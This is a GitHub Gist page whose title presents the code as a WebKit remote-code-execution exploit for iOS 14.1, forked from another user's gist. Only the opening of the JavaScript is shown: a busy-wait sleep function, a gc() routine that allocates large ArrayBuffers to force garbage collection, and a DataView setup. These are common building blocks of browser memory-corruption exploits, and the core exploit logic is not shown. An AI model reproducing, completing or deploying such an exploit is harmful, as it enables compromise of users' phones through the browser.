Skip to content

Instantly share code, notes, and snippets.

View SmartBoy84's full-sized avatar

_Qubarf SmartBoy84

View GitHub Profile
@SmartBoy84
SmartBoy84 / fuck.js
Last active May 23, 2021 10:13 — forked from ujin5/fuck.js
WebKit RCE on ios 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));